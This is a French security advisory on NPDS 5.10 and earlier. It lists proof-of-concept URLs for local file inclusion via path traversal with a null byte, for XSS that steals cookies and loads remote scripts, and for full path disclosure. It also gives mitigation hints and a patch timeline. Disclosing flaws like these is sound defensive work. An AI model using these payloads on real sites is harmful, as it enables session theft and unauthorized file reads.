*********************************************************
¦ Web                  : http://www.npds.org/           ¦
¦ Versions vulnérables : NPDS <= 5.10                   ¦
¦ Solution             : Appliquer le patch             ¦
*********************************************************


Description
***********
NPDS est un Gestionnaire de Communauté (Community Management System), relativement complet, performant et parlant vraiment français.
Même si à l’origine, le père de NPDS est PhpNuke, depuis longtemps déjà, le projet a évolué de manière totalement autonome.
NPDS est capable de supporter de fortes charges avec MySql : (plus de 150 utilisateurs en simultanés, + de 10 000 News, + de 50 catégories ...).
NPDS utilise massivement SuperCache (mécanisme de cache fonctionnant sur toutes les plates-formes).
Système de bloc avancé, gestion des membres et des groupes de membre, forums évolués, rubriques, critiques, annuaire multiples, téléchargements...
Un puissant éditeur HTML et un gestionnaire de fichier en ligne vous permettront de gérer la quasi-totalité de vos documents.
NPDS est aussi une plate-forme de développement de modules complémentaires, simple mais robuste.


Inclusion local
***************
http://[...]/header.php?Default_Theme=../apache/logs/error.log%00
http://[...]/modules/cluster-paradise/cluster-E.php?ModPath=../../../../../apache/logs/error.log%00


Cross Site Scripting
********************
http://[...]/header.php?Titlesitename=</title><script>alert(document.cookie)</script>
http://[...]/header.php?sitename="><script>alert(document.cookie)</script>
http://[...]/meta/meta.php?nuke_url="><script>alert(document.cookie)</script>
http://[...]/viewforum.php?forum=2"><script src=http://[...]/xss.js>
http://[...]/editpost.php?forum=1&post_id=888"><script src=http://[...]/xss.js>
http://[...]/editpost.php?forum=1"><script src=http://[...]/xss.js>
http://[...]/editpost.php?forum=1&topic="><script src=http://[...]/xss.js>
http://[...]/editpost.php?forum=1&arbre="><script src=http://[...]/xss.js>
http://[...]/user.php?op=only_newuser&uname="><script src=http://[...]/xss.js>
http://[...]/user.php?op=only_newuser&email="><script src=http://[...]/xss.js>


Full Path Disclosure
********************
http://[...]/header.php
http://[...]/modules/contact/contact.php
http://[...]/modules/sform/forum/forum_extender.php


Sécurisation
************
S'applique uniquement pour les cas cités plus haut.
Inclusion local      => str_replace()
Cross Site Scripting => htmlentities()
Full Path Disclosure => file_exists()


Credits
*******
Vulnérabilités trouvées par DarkFig.
URL : http://www.acid-root.new.fr/advisories/03060608.txt


Changelog
*********
[06-06-08] -- Vendeur contacté
[06-06-13] -- Patch disponible